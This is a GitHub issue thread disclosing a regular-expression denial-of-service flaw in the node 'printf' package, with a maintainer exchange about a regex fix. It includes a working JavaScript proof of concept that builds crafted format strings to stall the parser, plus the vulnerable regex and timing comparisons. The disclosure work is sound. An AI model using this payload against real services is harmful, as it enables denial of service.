### ISSUE TITLE
ReDoS in printf

### ISSUE THREAD

**Issue by yetingli** [adaltas/node-printf#31]
Hi,

I would like to report two Regular Expression Denial of Service (REDoS) vulnerability in `printf`.

It allows cause a denial of service when using crafted invalid formats.

You can execute the code below to reproduce the vulnerability.​

```JS
var printf = require("printf")

function build_attack(n) {
	var ret = "%(0)0"
	for (var i = 0; i < n; i++) {
		ret += "0"
	}

	return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        printf(attack_str, -42)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}
```

Feel free to contact me if you have any questions.

Best regards,
Yeting Li​​​​

**Comment by wdavidw** [comment]
Thank you for reporting this issue, did you look for a solution ?

**Comment by yetingli** [comment]
> Thank you for reporting this issue, did you look for a solution ?

Maybe a simple solution is to limit the length of the format? Or you can use the `re2`  (see the [link](https://www.npmjs.com/package/re2)) regular expression engine instead of the original one？

In addition, the [regular expression](https://github.com/adaltas/node-printf/blob/95b0d3c0173a9c53a9332ab4ac7a3e510e3625e2/lib/printf.js#L44) is vulnerable to regular expression denial of service (REDoS) due to overlapping capture groups `([0 +\-\#]*)(\*|\d+)?(\.)?(\*|\d+)?`. 

If you want to modify the regular expression, I can try to fix it.

**Comment by wdavidw** [comment]
I was going in the direction of modifying the regular expression. Please try to do it, I don't have much time at the moment, and write tests to back it.

**Comment by yetingli** [comment]
> I was going in the direction of modifying the regular expression. Please try to do it, I don't have much time at the moment, and write tests to back it.

Hi, the fixed regular expression is equivalent to the previous one, and the matching speed is much improved compared to before. If you have time, you can provide some test cases. Maybe I can get a more efficient regular expression based on these test cases.

**Comment by yetingli** [comment]
You can look at the following table to compare the matching speed of the two regular expressions.


|Attack String| Original  Regex| Fixed Regex |
| ------------- | ------------- | ------------- |
| "%(0)0"+ "0"*1000+"◎" | 2060 ms  | 11 ms  |
| "%(0)0"+ "0"*2000+"◎"  | 11187 ms  | 31 ms |
| "%(0)0"+ "0"*3000+"◎"  | 38149 ms | 68 ms |
